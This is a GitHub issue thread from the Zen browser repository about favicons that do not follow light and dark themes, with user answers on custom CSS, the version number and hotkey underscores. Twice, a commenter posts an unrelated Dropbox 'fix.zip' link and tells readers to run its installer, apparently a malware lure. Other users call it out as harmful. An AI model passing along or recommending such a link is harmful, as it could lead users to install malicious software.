### ISSUE TITLE
Favicons don't change using light or dark theme

### ISSUE THREAD

**Issue by PowerzinBR** [zen-browser/desktop#712]
### What happened?

Hi everyone! I was recently using this awesome browser and discovered that if i use a light or dark theme, the favicon won't change. For example GitHub favicon changes while using light or dark theme in chrome, while in Zen it don't.

Here's some photos of the issue
![image](https://github.com/user-attachments/assets/8a9dfb17-69e9-4380-9593-06de77912cd5)
![image](https://github.com/user-attachments/assets/1dd55750-7802-4749-809c-a56c5256abe9)

Also, i would like to ask if there's a way to insert a CSS in the browser when it starts, thanks for the support!

And another question, how do i see the browser version? Thanks :)

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0-a.29 

### Severity impact

Low

### What platform are you seeing the problem on?

Windows

**Comment by PowerzinBR** [comment]
Also one thing i forgot to ask, how do i remove this underscore thing from the browser?
![image](https://github.com/user-attachments/assets/b6235ac6-72dd-4942-b9b2-dd4cf8d2ed07)

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by PowerzinBR** [comment]
What does that have to do with the browser?

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by chriskirknielsen** [comment]
Don't click that, likely a harmful, or at the very least a spam bot.

You should open one issue per topic you want to address. Tacking on multiple questions make it difficult for the maintainers to find and answer. I am not a maintainer, by the way, just a Zen user who's keeping an eye on progress and issues.

I do agree about the favicons, that needs work — my thinking was we could have custom favicon background overrides, per-domain, but we'll see what the dev team comes up with!

I'll still try to answer to help a fellow user:
- No idea about custom CSS but you can always install the Stylus extension.
- The browser version can be accessed on Mac via the Menu bar: Zen Browser > About Zen, which gives you the (alpha) version number. I believe you should see something similar on Windows by the File menu (or maybe even within?), but I have not used Windows in a while, so I'm not too sure, sorry! If that fails, maybe open the `...` menu next to the extensions and check out the Help section at the bottom?
- The underscores are hotkey indicators, I believe.

**Comment by PowerzinBR** [comment]
Thank you! I knew it has a harmful link because there's nothing related to the browser, i will surely not repeat my mistake in addressing topics in one issue. Thank s for answering. About the hotkeys, there's no way to disable it?

**Comment by PowerzinBR** [comment]
UPDATE: I discovered that we can create an userChrome.css file in a folder called chrome in zen, i discovered it in the docs. Thanks.
